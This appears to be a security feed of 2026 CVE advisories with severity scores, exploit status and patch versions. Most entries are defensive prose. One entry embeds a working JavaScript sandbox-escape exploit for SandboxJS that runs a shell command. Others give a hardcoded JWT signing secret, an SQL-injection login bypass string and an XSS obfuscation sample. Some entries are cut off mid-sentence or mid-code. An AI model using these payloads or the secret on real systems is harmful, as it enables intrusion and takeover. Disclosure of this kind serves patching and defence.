Skip to main content
CVE-2026-43500 HIGH POC PATCH NEWS Act Now

Buffer overflow in Linux kernel rxrpc subsystem allows local authenticated attackers to achieve arbitrary code execution with kernel privileges. The vulnerability stems from improper handling of shared fragment memory in DATA and RESPONSE packet processing, where the kernel fails to unshare externally-owned page fragments before in-place decryption operations. This creates a buffer overflow condition (CWE-787) exploitable by local users with low privileges. Patches are available for kernel versions 6.18.29, 7.0.6, and 7.1-rc3. EPSS and KEV status not provided in available data.

Memory Corruption Buffer Overflow Linux
NVD VulDB GitHub Exploit-DB
CVSS 3.1
7.8
EPSS
0.0%
CVE-2026-44643 CRITICAL POC PATCH GHSA Act Now

Remote code execution in angular-expressions versions ≤1.5.1 allows unauthenticated network attackers to escape the expression sandbox via malicious filter payloads and execute arbitrary system commands with no user interaction required. CVSS 9.3 (Critical) with confirmed public exploit code available. Vendor-released patch in version 1.5.2 addresses the sandbox escape. Affects applications using angular-expressions as a standalone module for evaluating user-supplied Angular.JS expressions.

Code Injection RCE Angular Expressions
NVD GitHub
CVSS 4.0
9.3
EPSS
0.1%
CVE-2026-43639 HIGH POC PATCH This Week

{providerId}/clients/existing endpoint, allowing authenticated provider users to add any organization to their provider without the target's consent. Publicly available exploit code exists (detailed writeup by Sanjok Karki), and vendor-released patch v2026.4.0 fully addresses the issue via GitHub PR #7372. Self-hosted installations are unaffected due to endpoint access restrictions. CVSS 8.9 reflects high confidentiality, integrity, and availability impact with high attack complexity and high privilege requirements.

Authentication Bypass Server
NVD GitHub VulDB
CVSS 4.0
8.9
EPSS
0.0%
CVE-2026-43640 HIGH POC PATCH This Week

Authentication bypass in Bitwarden Server versions prior to 2026.4.1 allows authenticated users with SCIM management privileges to retrieve or rotate organization SCIM API keys without master password re-authentication. An attacker with valid session credentials and SCIM management rights can obtain sensitive API keys that enable user provisioning control, potentially leading to unauthorized account creation, modification, or deletion within the organization. Public exploit code exists, and vendor patch v2026.4.1 addresses the issue via GitHub PR #7403.

Information Disclosure Server
NVD GitHub
CVSS 4.0
8.6
EPSS
0.1%
CVE-2026-44578 HIGH POC PATCH GHSA This Week

Server-side request forgery in Next.js allows remote unauthenticated attackers to proxy requests to arbitrary internal or external destinations through crafted WebSocket upgrade requests in self-hosted applications using the built-in Node.js server. Attackers can access internal services and cloud metadata endpoints (AWS, GCP, Azure instance metadata) without authentication. This affects Next.js versions 13.4.13 through 15.5.15 and 16.0.0 through 16.2.4. Vendor-released patches available in versions 15.5.16 and 16.2.5. Vercel-hosted deployments are explicitly not affected.

SSRF Node.js
NVD GitHub VulDB
CVSS 3.1
8.6
EPSS
0.0%
CVE-2026-44738 HIGH POC PATCH GHSA This Week

Information disclosure in Grav CMS versions prior to 2.0.0-rc.2 allows authenticated users with admin.pages role to extract all site configuration secrets via Twig sandbox bypass. Attackers can invoke config.toArray() from page content to dump SMTP passwords, AWS keys, OAuth client secrets, and API tokens into rendered HTML. CVSS 7.7 (High) with confirmed scope change reflects cross-tenant impact in multi-admin environments. EPSS data not available; no confirmed active exploitation or public POC identified at time of analysis.

Information Disclosure Grav
NVD GitHub
CVSS 3.1
7.7
EPSS
0.0%
CVE-2026-44573 HIGH POC PATCH GHSA This Week

Middleware bypass in Next.js Pages Router applications allows unauthenticated access to protected server-side rendered JSON data when i18n is configured. Attackers can retrieve SSR page data through locale-less `/_next/data/<buildId>/<page>.json` requests without triggering middleware authorization checks. This affects Next.js versions 12.2.0 through 15.5.15 and 16.0.0 through 16.2.4. Vercel released patches in versions 15.5.16 and 16.2.5 as part of a coordinated disclosure addressing multiple security issues. CVSS 7.5 (High) with network-accessible, low-complexity exploitation requiring no authentication. No public exploit code or CISA KEV listing identified at time of analysis.

Authentication Bypass
NVD GitHub VulDB HeroDevs
CVSS 3.1
7.5
EPSS
0.0%
CVE-2026-8260 HIGH POC This Week

Buffer overflow in D-Link DCS-935L camera firmware versions up to 1.10.01 allows authenticated remote attackers to achieve complete system compromise via crafted AdminPassword parameter to the HNAP service. Public exploit code exists on GitHub (0xcc12138/DCS-935L-HNAP-Service-CVE), demonstrating weaponization of this vulnerability. CVSS 4.0 score of 7.4 with CVSS:4.0/E:P confirms proof-of-concept exploitation. While authentication is required (PR:L), the low attack complexity (AC:L) and network attack vector (AV:N) combined with publicly available exploit code make this a practical remote exploitation risk for devices exposed to untrusted networks or compromised accounts.

D-Link Buffer Overflow
NVD VulDB GitHub
CVSS 4.0
7.4
EPSS
0.0%
CVE-2026-6433 HIGH POC This Week

Remote code execution in the Custom css-js-php WordPress plugin versions up to 2.0.7 allows unauthenticated attackers to execute arbitrary PHP code on the server through SQL injection chained with PHP eval(). The plugin fails to sanitize user input before passing it to SQL queries, with query results subsequently executed via eval(). EPSS score of 0.02% (5th percentile) suggests low observed exploitation activity, and no public exploit code has been identified at time of analysis, though the technical barrier is low (CVSS AC:L/PR:N).

PHP RCE WordPress
NVD WPScan VulDB
CVSS 3.1
7.3
EPSS
0.0%
CVE-2026-42869 CRITICAL PATCH Act Now

Authentication bypass in SOCFortress CoPilot versions prior to 0.1.57 allows remote unauthenticated attackers to forge admin-scoped JWT tokens and gain full control of the security operations platform. The application ships with a publicly known JWT signing secret hardcoded as a fallback value (bL4unrkoxtFs1MT6A7Ns2yMLkduyuqrkTxDV9CjlbNc=) in backend/app/auth/utils.py and .env.example. Any deployment using the default Docker Compose setup or where JWT_SECRET is not explicitly set signs all authentication tokens with this known value, enabling attackers to impersonate administrators and control every integrated security tool without credentials. CVSS 10.0 with network vector and no authentication required. Fix confirmed in version 0.1.57 via GitHub commit 4640511a0cf2e7b144a71375b5b349a8318cb186.

Authentication Bypass Docker
NVD GitHub
CVSS 3.1
10.0
EPSS
0.1%
CVE-2026-43898 CRITICAL PATCH GHSA Act Now

{ return f.caller } ``` That leaks the host-side callback that invoked the sandbox function. This leaked callback is the internal `LispType.Call` op, which is registered in [call.ts](https://github.com/nyariv/SandboxJS/blob/1e6785658c94f5f2fb8e4a02cfcf1e7821b8be7f/src/executor/ops/call.ts#L16-L17). The leaked callback accepts a **params** object from the attacker and uses its fields without any authentication checks. if you looked at those branches [call.ts:47](https://github.com/nyariv/SandboxJS/blob/1e6785658c94f5f2fb8e4a02cfcf1e7821b8be7f/src/executor/ops/call.ts#L47-L55), [call.ts:70](https://github.com/nyariv/SandboxJS/blob/1e6785658c94f5f2fb8e4a02cfcf1e7821b8be7f/src/executor/ops/call.ts#L70), [call.ts:149](https://github.com/nyariv/SandboxJS/blob/1e6785658c94f5f2fb8e4a02cfcf1e7821b8be7f/src/executor/ops/call.ts#L149-L153). This means the attacker controls `obj.context`, `obj.prop`, `obj.get`, `context.evals.get` and `a`. This can lead to direct invocation of an internal primitive with forged operands ```js const sandb = require('@nyariv/sandboxjs').default; const sand = new sandb(); const payload = ` const callOp = (function fn() { return fn.caller; })(); function makeContext(capture = () => {}) { return { ctx: { options: 0 }, evals: { get: capture } }; } function leakStatic(obj, prop) { let leaked; callOp({ done() {}, a() {}, b: [], obj: { context: obj, prop, get() {} }, context: makeContext((fn) => (leaked = fn, () => 1)) }); return leaked; } function callDirect(fn, args) { let value; callOp({ done(_, result) { value = result; }, a() {}, b: args, obj: fn, context: makeContext() }); return value; } callDirect(leakStatic(Object, 'defineProperty'), [ leakStatic, 'call', callDirect(leakStatic(Object, 'getOwnPropertyDescriptor'), [ callDirect(leakStatic(Object, 'getPrototypeOf'), [() => 0]), 'constructor' ]) ]); let hostFn; callOp({ done(_, result) { hostFn = result; }, a: leakStatic, b: [], obj: { context: 'return process.getBuiltinModule("child_process").execSync("whoami").toString()', get() {} }, context: makeContext() }); return hostFn(); `; console.log(sand.compile(payload)().run()); ``` _Sandbox escape leads to RCE_

Code Injection RCE
NVD GitHub VulDB
CVSS 3.1
10.0
EPSS
0.0%
CVE-2026-6815 MEDIUM POC This Month

Path traversal in Casdoor's Local File System storage provider allows authenticated administrators to write arbitrary files to the filesystem by bypassing path sanitization in the storage sandbox. An attacker with administrative privileges can exploit insufficient input validation to create or overwrite files anywhere on the host system. EPSS score of 0.03% indicates minimal real-world exploitation probability despite the moderate CVSS 5.9 score, suggesting the vulnerability requires both authenticated access and administrative privileges that significantly limit practical attack surface.

Path Traversal Casdoor
NVD Exploit-DB VulDB
CVSS 3.1
5.9
EPSS
0.0%
CVE-2026-25244 CRITICAL PATCH GHSA Act Now

Command injection in @wdio/browserstack-service allows arbitrary code execution when malicious git branch names are processed during test orchestration. Attackers can craft repository branch names containing shell metacharacters that execute when the BrowserStack service's getGitMetadataForAISelection() function unsafely passes branch names to Node.js execSync() calls. Exploitation requires configuring WebdriverIO to point at an attacker-controlled repository or cloning into a directory where tests run, making this primarily a supply chain and CI/CD pipeline risk. Publicly available exploit code exists with working proof-of-concept demonstrating file creation via injected commands. Vendor-released patch available in version 9.24.0 per GitHub advisory GHSA-5c46-x3qw-q7j7. CVSS 9.8 (Critical) reflects maximum impact, but real-world exploitation requires either social engineering developers to use malicious repos or compromising upstream dependencies - exploitation probability depends heavily on organizational code review and repository vetting practices.

Node.js Command Injection Information Disclosure RCE
NVD GitHub
CVSS 3.1
9.8
EPSS
0.4%
CVE-2026-38567 CRITICAL Act Now

SQL injection in HireFlow v1.2 enables unauthenticated attackers to bypass authentication and exfiltrate the entire database via /login and /search endpoints. Direct string concatenation without parameterization allows both authentication bypass using comment injection (admin'--) and UNION-based data extraction. Public proof-of-concept exists (SSVC: POC, automatable, total technical impact), though EPSS exploitation probability remains low (0.10%, 28th percentile), suggesting limited observed exploitation attempts. CISA SSVC framework classifies this as automatable with total technical impact, warranting immediate patching despite relatively low EPSS score.

SQLi N A
NVD GitHub
CVSS 3.1
9.8
EPSS
0.1%
CVE-2026-40636 CRITICAL PATCH Act Now

Hard-coded credentials in Dell ECS 3.8.1.0-3.8.1.7 and ObjectScale <4.3.0.0 allow unauthenticated filesystem access. Despite CVSS 9.8 (network vector), the description explicitly states 'local access' is required, creating a critical discrepancy between scoring and actual attack surface. Attackers with local system access can leverage embedded credentials to gain unauthorized filesystem access. No active exploitation (CISA KEV) or public exploit confirmed at time of analysis. Dell advisory DSA-2026-047 addresses the vulnerability.

Authentication Bypass Dell
NVD VulDB
CVSS 3.1
9.8
EPSS
0.1%
CVE-2026-43899 CRITICAL PATCH Act Now

DeepChat is an open-source artificial intelligence agent platform that unifies models, tools, and agents. Prior to v1.0.4-beta.1, An incomplete mitigation for CVE-2025-55733 leaves DeepChat vulnerable to an arbitrary protocol execution bypass (RCE). While the patch correctly restricted api.openExternal() inside the renderer's preload/index.ts script, it structurally neglected to sanitize native Electron pop-up window handlers. An attacker or a compromised AI endpoint returning a Markdown link can trigger a target="_blank" native window interception in tabPresenter.ts, which forwards the malicious URL directly to shell.openExternal(url) and completely bypasses the isValidExternalUrl security boundary. This vulnerability is fixed in v1.0.4-beta.1.

Authentication Bypass Deepchat
NVD GitHub
CVSS 3.1
9.6
EPSS
0.1%
CVE-2026-8305 MEDIUM POC PATCH This Month

Authentication bypass in OpenClaw's BlueBubbles webhook handler allows remote attackers to send crafted webhook requests without credentials. The handleBlueBubblesWebhookRequest function in extensions/bluebubbles/src/monitor.ts incorrectly exempts localhost requests from authentication, enabling IP spoofing attacks to bypass security controls. Exploit code is publicly available on GitHub. Patch released in version 2026.2.12 (commit a6653be). CVSS 7.3 reflects network-accessible unauthenticated attack with low complexity affecting confidentiality, integrity, and availability.

Authentication Bypass Openclaw
NVD VulDB GitHub
CVSS 4.0
5.5
EPSS
0.2%
CVE-2026-8321 MEDIUM POC This Month

Authentication bypass in Inkeep Agents 0.58.14 allows remote unauthenticated attackers to circumvent authentication controls via alternate channel manipulation in the runAuth middleware. The vulnerability exists in the createDevContext function of agents-api/src/middleware/runAuth.ts, enabling unauthorized access to protected resources with low impact to confidentiality, integrity, and availability. Publicly available exploit code exists (GitHub issue #3024), and the vendor has not yet responded to the vulnerability report, meaning no patch is currently available.

Authentication Bypass Agents
NVD VulDB GitHub
CVSS 4.0
5.5
EPSS
0.1%
CVE-2026-8319 MEDIUM POC This Month

Denial of service in aiwaves-cn agents up to commit e8c4e3c2d19739d3dff59e577d1c97090cc15f59 allows remote unauthenticated attackers to exhaust server resources via the recall_relevant_memories_to_working_memory function in cheshire_cat_core component, causing service unavailability. Publicly available exploit code exists (CWE-400: Uncontrolled Resource Consumption). With an CVSS score of 5.3 and EPSS exploitation probability rated 'P', this represents a moderate-severity availability threat suitable for prioritization in resource-constrained environments.

Denial Of Service Agents
NVD VulDB GitHub
CVSS 4.0
5.5
EPSS
0.0%
CVE-2026-8318 MEDIUM POC This Month

VectifyAI PageIndex up to commit f50e52975313c6716c02b20a119577a1929decba allows remote unauthenticated denial-of-service attacks through an infinite loop vulnerability in the PDF Table of Contents handler. The toc_transformer function in pageindex/page_index.py can be triggered remotely without authentication, causing the application to hang and become unresponsive. Public exploit code is available, increasing real-world attack likelihood.

Denial Of Service Pageindex
NVD VulDB GitHub
CVSS 4.0
5.5
EPSS
0.0%
CVE-2026-7813 CRITICAL PATCH GHSA Act Now

Authorization bypass and privilege escalation in pgAdmin 4 server mode allows authenticated users to access other users' private database servers, credentials, and background processes by guessing object IDs. Attackers can execute arbitrary shell commands as the server owner by modifying the passexec_cmd field through unprotected API endpoints. The vulnerability combines horizontal privilege escalation (accessing peer users' objects), vertical escalation (executing commands as owner), and credential theft (SSL keys, passfiles). No public exploit code identified at time of analysis, but exploitation requires only low-privilege authentication with no user interaction (CVSS PR:L/UI:N). EPSS data not provided; CISA KEV status not confirmed.

Privilege Escalation Authentication Bypass Pgadmin 4
NVD GitHub
CVSS 4.0
9.4
EPSS
0.1%
CVE-2026-44477 CRITICAL PATCH GHSA Act Now

Privilege escalation and OS command execution in CloudNativePG (CNPG) versions prior to 1.28.3 and 1.29.1 allow low-privileged PostgreSQL roles to gain superuser access and execute arbitrary commands inside the primary database pod. The metrics exporter connects as the postgres superuser and only demotes via SET ROLE, leaving session_user as superuser; an attacker who owns a database (including the default `app` role) can shadow unqualified identifiers like `current_database()` referenced in the stock `default-monitoring.yaml`, triggering the chain on the next scrape (≤30s). No public exploit identified at time of analysis, but the vulnerability is highly impactful (CVSS 9.4) and affects default deployments without custom metrics.

Privilege Escalation Command Injection SQLi PostgreSQL
NVD GitHub VulDB
CVSS 4.0
9.4
EPSS
0.0%
CVE-2026-43900 CRITICAL PATCH Act Now

DeepChat is an open-source artificial intelligence agent platform that unifies models, tools, and agents. Prior to v1.0.4-beta.1, a Cross-Site Scripting (XSS) vulnerability exists due to a discrepancy between the backend validation layer and the frontend browser rendering engine. The SVGSanitizer (src/main/lib/svgSanitizer.ts) restricts script execution by scrubbing javascript: protocols using plain-text regular expressions. However, it fails to account for HTML entity decoding prior to Vue's v-html DOM insertion inside the SvgArtifact.vue component. By feeding an SVG artifact with obfuscated entities (e.g., j&#x61;vascript:alert(1)), an attacker can completely bypass the sanitizer, culminating in arbitrary JavaScript execution when a victim interacts with the rendered SVG Element. This vulnerability is fixed in v1.0.4-beta.1.

XSS Deepchat
NVD GitHub
CVSS 3.1
9.3
EPSS
0.0%
CVE-2026-43638 MEDIUM POC PATCH This Month

Bitwarden Server prior to v2026.4.1 allows any authenticated user to write ciphers (encrypted credentials) into arbitrary organizations via the POST /ciphers/import-organization endpoint by submitting an empty collections array, bypassing authorization checks. This missing authorization vulnerability (CWE-862) affects all authenticated users regardless of organization membership, enabling them to inject malicious credentials or pivot across organizations. Publicly available exploit code exists, and the vendor has released patched version 2026.4.1.

Authentication Bypass Server
NVD GitHub
CVSS 4.0
5.3
EPSS
0.0%
CVE-2026-44432 HIGH PATCH GHSA This Week

Decompression bomb safeguards in urllib3 2.6.0 can be bypassed during streaming API operations, causing excessive CPU and memory consumption on client systems. Applications using urllib3 versions 2.6.0 through 2.6.x that stream Brotli-compressed responses with multiple read() calls, or invoke drain_conn() after partial decompression, may decompress entire payloads instead of requested chunks. This allows malicious servers to trigger resource exhaustion attacks against urllib3 clients. Vendor-released patch (version 2.7.0) confirmed by GitHub advisory GHSA-mf9v-mfxr-j63j. No public exploit identified at time of analysis, but exploitation requires only a malicious HTTP server delivering compressed responses - a low-complexity attack scenario.

Information Disclosure Google
NVD GitHub VulDB
CVSS 4.0
8.9
EPSS
0.0%
CVE-2026-36734 HIGH This Week

Command injection in EDIMAX BR-6428nS V3 wireless router firmware 1.15 allows authenticated attackers to execute arbitrary system commands via crafted input to WLAN configuration interface. The vulnerability requires low-privilege network authentication but no user interaction, enabling complete device compromise including credential theft, traffic interception, and pivot attacks into connected networks. EPSS score of 0.17% suggests low probability of mass exploitation, though a proof-of-concept is publicly available on GitHub, lowering the barrier for targeted attacks against exposed management interfaces.

Command Injection N A
NVD GitHub
CVSS 3.1
8.8
EPSS
0.2%
CVE-2026-42603 HIGH PATCH This Week

Remote code execution in OWASP BLT versions prior to 2.1.2 enables attackers to execute arbitrary code with repository write permissions via malicious GitHub pull requests. The vulnerability exploits a GitHub Actions workflow misconfiguration where pull_request_target triggers execute code directly from attacker-controlled forks without proper validation. EPSS data not available; no confirmed active exploitation (not in CISA KEV); publicly disclosed via GitHub Security Advisory GHSA-cgvj-qg2h-cqfh.

Code Injection RCE Blt
NVD GitHub
CVSS 3.1
8.8
EPSS
0.0%
CVE-2026-44346 HIGH PATCH GHSA This Week

Command injection in BentoML 1.4.38 and earlier allows attackers to execute arbitrary code on build hosts when victims containerize malicious bentos. Exploitation occurs during the `bentoml containerize` workflow when unvalidated `envs[*].name` and `docker.base_image` fields from imported bentofile.yaml are interpolated into generated Dockerfiles without escaping, enabling newline-injection of RUN directives executed by `docker build`. This is a sibling vulnerability to CVE-2026-33744 and CVE-2026-35043 which patched the same injection class in `system_packages` fields but left these additional attack surfaces unaddressed. Patch version 1.4.39 available from vendor. No CISA KEV listing or public POC outside gated HuggingFace repository at time of analysis, but end-to-end reproduction confirmed by reporter on BentoML 1.4.38.

Python Docker Command Injection
NVD GitHub
CVSS 3.1
8.8
EPSS
0.0%
CVE-2026-44345 HIGH PATCH GHSA This Week

Command injection in BentoML allows arbitrary code execution on developer workstations during containerization of untrusted bento packages. Attackers craft malicious bento.yaml files with newline-injected docker.base_image values that smuggle Dockerfile RUN directives into the generated Dockerfile template. When victims run 'bentoml containerize' on the malicious bento, Docker build executes the injected commands on the host system with full developer privileges. This vulnerability (GHSA-78f9-r8mh-4xm2) is part of a documented cluster alongside GHSA-w2pm-x38x-jp44, CVE-2026-33744, and CVE-2026-35043, all involving unsafe Jinja2 template interpolation in BentoML's Dockerfile generation pipeline. Fixed in version 1.4.39. No active exploitation confirmed at time of analysis; EPSS data not available for 2026-dated CVE.

Python Docker Command Injection
NVD GitHub
CVSS 3.1
8.8
EPSS
0.0%
CVE-2026-28847 HIGH PATCH This Week

Memory-corruption crash in Apple's WebKit web-content engine lets a malicious website terminate the content-rendering process across iOS/iPadOS, macOS, tvOS, visionOS and watchOS prior to the 26.5 (and 18.7.9) releases. The flaw is triggered simply by viewing attacker-controlled web content, requiring no authentication but one user action (opening a page). There is no public exploit identified at time of analysis and SSVC rates exploitation as none, though the assigned CVSS 8.8 reflects worst-case memory-corruption potential rather than the crash-only behavior Apple documents.

Apple Buffer Overflow Ios And Ipados Tvos Visionos +1
NVD VulDB
CVSS 3.1
8.8
EPSS
0.0%
CVE-2026-28955 HIGH PATCH This Week

The issue was addressed with improved memory handling. This issue is fixed in iOS 18.7.9 and iPadOS 18.7.9, iOS 26.5 and iPadOS 26.5, macOS Tahoe 26.5, tvOS 26.5, visionOS 26.5, watchOS 26.5. Processing maliciously crafted web content may lead to an unexpected process crash.

Apple Buffer Overflow Ios And Ipados Tvos Visionos +1
NVD VulDB
CVSS 3.1
8.8
EPSS
0.0%
CVE-2026-44521 HIGH PATCH GHSA This Week

Authenticated SQL injection in elFinder's MySQL volume driver (elFinderVolumeMySQL) allows any logged-in user, including those with read-only access, to inject malicious SQL via crafted file hash parameters. The vulnerability stems from improper validation of decoded file hashes before use in SQL queries, enabling attackers to manipulate query logic through the target parameter. This affects only installations using the non-default MySQL volume driver (versions <=2.1.67); the default LocalFileSystem driver is not vulnerable. Vendor-released patch available in version 2.1.68. CVSS 8.8 with network vector and low attack complexity indicates straightforward exploitation for authenticated attackers.

Denial Of Service Information Disclosure SQLi
NVD GitHub VulDB
CVSS 3.1
8.8
EPSS
0.0%
CVE-2026-28995 HIGH PATCH This Week

Sandbox escape vulnerability in Apple operating systems allows malicious apps with low privileges to break out of application sandbox and execute code with elevated privileges on the host system. Affects iOS, iPadOS, macOS, tvOS, visionOS, and watchOS across multiple versions. Apple has released patches for all affected platforms. EPSS score of 0.02% (7th percentile) indicates low probability of mass exploitation in the wild, though the CVSS 8.8 score reflects significant potential impact if successfully weaponized. No active exploitation confirmed at time of analysis.

Privilege Escalation Apple
NVD
CVSS 3.1
8.8
EPSS
0.0%
CVE-2026-28947 HIGH PATCH This Week

Use-after-free in WebKit allows remote attackers to trigger Safari crashes and potentially achieve arbitrary code execution across Apple's entire ecosystem (iOS, iPadOS, macOS, tvOS, visionOS, watchOS) via maliciously crafted web content. Users must visit or be tricked into visiting a malicious webpage (UI:R). Despite CVSS 8.8 (High) with theoretical code execution impact (C:H/I:H/A:H), EPSS probability is extremely low (0.02%, 5th percentile), indicating minimal observed exploitation activity. No public exploit identified at time of analysis, and vendor patches are available across all platforms as of version 26.5.

Denial Of Service Apple Use After Free Memory Corruption Ios And Ipados +3
NVD VulDB
CVSS 3.1
8.8
EPSS
0.0%
CVE-2026-28923 HIGH PATCH This Week

Sandbox escape in macOS logging subsystem allows malicious applications with low privileges to break containment and access system resources beyond sandbox boundaries. The vulnerability stems from improper data redaction in logging mechanisms (CWE-532), affecting macOS Tahoe 26.x, Sequoia 15.x, and Sonoma 14.x prior to their May 2026 updates. Apple has released patches for all affected versions. EPSS score of 0.02% (4th percentile) indicates minimal widespread exploitation likelihood, with no confirmed active exploitation or public POC at time of analysis. CVSS 8.8 HIGH reflects the scope change (S:C) allowing escape from sandboxed context to system-level access with complete confidentiality, integrity, and availability impact.

Apple Information Disclosure
NVD
CVSS 3.1
8.8
EPSS
0.0%
CVE-2026-28978 HIGH PATCH This Week

Sandbox escape in macOS Sequoia, Sonoma, and Tahoe allows malicious applications with low privileges to break containment and gain elevated system access. Apple fixed this permissions handling flaw in macOS 15.7.7, 14.8.7, and 26.5 after addressing inadequate sandbox restrictions. No active exploitation confirmed (CISA KEV absent), but the CVSS scope change (S:C) indicates complete sandbox bypass with high impact to confidentiality, integrity, and availability. EPSS score of 0.01% suggests low probability of mass exploitation despite the severity, likely due to the requirement for local app installation and low-privilege authenticated access.

Authentication Bypass Apple
NVD
CVSS 3.1
8.8
EPSS
0.0%
CVE-2026-41489 HIGH PATCH This Week

Pi-hole is a DNS sinkhole that protects devices from unwanted content without installing any client-side software. From 6.0 to before Core 6.4.2 and FTL 6.6.1, two shell scripts executed as root by systemd (pihole-FTL-prestart.sh and pihole-FTL-poststop.sh) read the files.pid path from this config without validation and use it in privileged file operations (install and rm -f). By writing an arbitrary path into files.pid, an attacker with pihole privilege can cause root to delete and then recreate any file on the system outside the ProtectSystem=full-restricted directories, gaining write access to it. On a default Pi-hole installation this yields local privilege escalation to root via SSH authorized keys manipulation. If /root/.ssh/authorized_keys does not exist (default on fresh installs), only ExecStartPre is required. If the file exists, ExecStopPost deletes it first, and the same restart triggers both hooks in sequence. This vulnerability is fixed in Core 6.4.2 and FTL 6.6.1.

Privilege Escalation Pi Hole
NVD GitHub VulDB
CVSS 3.1
8.8
EPSS
0.0%
CVE-2026-7816 HIGH PATCH GHSA This Week

Authenticated remote code execution in pgAdmin 4 versions before 9.15 allows low-privilege users to execute arbitrary OS commands on the pgAdmin server via unsanitized input in the Import/Export query export feature. Attackers inject malicious payloads into psql \copy metacommand templates to break out of the query context and invoke PROGRAM directives or write arbitrary files. No public exploit code identified at time of analysis, but exploitation requires only low-privilege authenticated access with no user interaction (CVSS AV:N/AC:L/PR:L/UI:N). EPSS data not provided; KEV status not confirmed.

Command Injection SQLi Pgadmin 4
NVD GitHub
CVSS 4.0
8.7
EPSS
0.2%
CVE-2026-7790 HIGH PATCH GHSA This Week

Uncontrolled Resource Consumption vulnerability in ninenines cowlib (cow_http_te module) allows Excessive Allocation. The chunked transfer-encoding parser in cow_http_te accepts an unbounded number of hex digits in the chunk-size field. Each digit causes a bignum multiplication (Len * 16 + digit), so parsing N hex digits requires O(N²) CPU work and O(N) memory. Additionally, when input is drip-fed, the parser discards the accumulated length on each partial read and restarts from zero on resumption, raising the cost to O(N³). An unauthenticated remote attacker can exploit this by sending an HTTP/1.1 request with Transfer-Encoding: chunked and a very long chunk-size hex string to cause denial of service through CPU exhaustion and memory amplification. This vulnerability is associated with program file src/cow_http_te.erl and program routines cow_http_te:stream_chunked/2, cow_http_te:chunked_len/4. This issue affects cowlib: from 0.6.0 before 2.16.1.

Denial Of Service Cowlib
NVD GitHub VulDB
CVSS 4.0
8.7
EPSS
0.1%
CVE-2026-7815 HIGH PATCH GHSA This Week

SQL injection in pgAdmin 4 Maintenance Tool allows authenticated users with tools_maintenance permission to execute arbitrary SQL and escalate to operating-system command execution on PostgreSQL database hosts. Four JSON fields (buffer_usage_limit, vacuum_parallel, vacuum_index_cleanup, reindex_tablespace) are concatenated unsafely into VACUUM/ANALYZE/REINDEX commands passed to psql. Attackers can break out of option syntax, inject SQL statements, and leverage PostgreSQL's COPY ... TO PROGRAM to achieve OS-level code execution. Fixed in version 9.15 via server-side allow-listing and proper input sanitization using qtIdent filter. EPSS data not available; no public exploit identified at time of analysis.

SQLi PostgreSQL
NVD GitHub
CVSS 4.0
8.7
EPSS
0.0%
CVE-2026-43888 HIGH PATCH This Week

Outline is a service that allows for collaborative documentation. Prior to 1.7.0, ZipHelper.extract computes the extraction path for each entry by passing a full filesystem path through trimFileAndExt, a filename helper that calls path.basename on its input when truncating. When a zip entry's nested path is long enough to push the joined filesystem path over MAX_PATH_LENGTH (4096 bytes), trimFileAndExt silently drops all directory components and returns a bare filename. fs.createWriteStream then opens the file relative to the process working directory instead of inside the extraction sandbox, and the escaped file persists after import cleanup because cleanupExtractedData only removes the temporary extraction directory. This vulnerability is fixed in 1.7.0.

Path Traversal Outline
NVD GitHub
CVSS 3.1
8.7
EPSS
0.0%
CVE-2026-43912 HIGH PATCH This Week

Vaultwarden is a Bitwarden-compatible server written in Rust. Prior to 1.35.5, Vaultwarden does not enforce that a groups_users.users_organizations_uuid entry belongs to the same organization as groups.groups_uuid, or a collections_groups.collections_uuid entry belongs to the same organization as collections_groups.groups_uuid. Multiple organization group-management endpoints accept arbitrary MembershipId and CollectionId values and persist them directly without verifying org consistency. This lets an attacker who is Admin in Organization A, and only a low-privileged member in Organization B bind their Org B membership UUID into an Org A group, then use that foreign group relationship to gain unauthorized access to Org B vault data. With an accessAll=true Org A group, the attacker can make /api/sync and /api/ciphers enumerate Org B ciphers. Once those unauthorized sync results reveal Org B collection IDs, the attacker can also bind those foreign collection IDs to the Org A group and turn the same flaw into write access over Org B items. This vulnerability is fixed in 1.35.5.

Authentication Bypass Hashicorp
NVD GitHub VulDB
CVSS 3.1
8.7
EPSS
0.0%
CVE-2026-44543 HIGH PATCH GHSA This Week

Template injection in Rancher Local Path Provisioner allows Kubernetes cluster operators with ConfigMap edit permissions to escalate privileges to node-level root access. Attackers with write access to the local-path-config ConfigMap can inject malicious Pod templates that bypass security controls, creating privileged containers with full host filesystem access. This enables theft of ServiceAccount tokens from co-located pods, access to other tenants' persistent volume data, and arbitrary modification of host node files. Vendor-released patch: v0.0.36. CVSS 8.7 (High) reflects the high-privilege prerequisite (PR:H) but scope change to container escape (S:C). No public exploit identified at time of analysis, though exploitation is straightforward for authenticated cluster operators.

Kubernetes Docker Information Disclosure Ssti
NVD GitHub VulDB
CVSS 3.1
8.7
EPSS
0.0%
CVE-2026-44985 HIGH GHSA This Week

Cross-Site WebSocket Hijacking (CSWSH) in Dozzle's /exec and /attach endpoints allows authenticated shell access bypass when --enable-shell is enabled. The vulnerability stems from WebSocket origin validation bypass (CheckOrigin returns true) combined with SameSite=Lax JWT cookies, enabling attackers on same-site origins (sibling subdomains or localhost services) to hijack victim WebSocket sessions and execute arbitrary commands in Docker containers. Affects all Dozzle deployments through version 10.5.1 with shell access enabled. No public exploit identified at time of analysis, but detailed proof-of-concept exists in the GitHub advisory demonstrating container shell access via Python script. CVSS score not assigned, but CWE-346 classification indicates origin validation failure.

Python Docker RCE
NVD GitHub VulDB
CVSS 4.0
8.7
EPSS
0.0%
CVE-2026-42595 HIGH PATCH GHSA This Week

Server-side request forgery in Gotenberg's Chromium URL-to-PDF endpoint allows unauthenticated remote attackers to exfiltrate cloud credentials and access internal services. The primary `/forms/chromium/convert/url` endpoint ships with no default deny-list for HTTP/HTTPS targets - only blocking file:// URIs - enabling direct access to AWS/GCP/Azure metadata endpoints at 169.254.169.254, RFC 1918 private networks, and localhost services. Even when administrators configure custom deny-lists, attackers bypass validation via HTTP 302 redirects, as Chromium follows redirects without re-validating destinations. Vendor-confirmed public exploit code exists (PoC in GHSA-chwh-f6gm-r836). Patch available in version 8.32.0.

SSRF Microsoft Python Docker Google
NVD GitHub
CVSS 3.1
8.6
EPSS
0.1%
CVE-2025-10470 HIGH PATCH This Week

Memory exhaustion denial-of-service in WSO2 Identity Server's Magic Link authenticator allows remote unauthenticated attackers to crash the authentication service by flooding invalid login requests without rate limiting. The vulnerability affects deployments using the Magic Link authentication flow and has an EPSS score indicating moderate exploitation likelihood. WSO2 has published a security advisory (WSO2-2025-4469) with remediation guidance for affected Identity Server and Carbon MagicLink Authenticator Module installations.

Denial Of Service Wso2 Identity Server Wso2 Carbon Magiclink Authenticator Module
NVD VulDB
CVSS 3.1
8.6
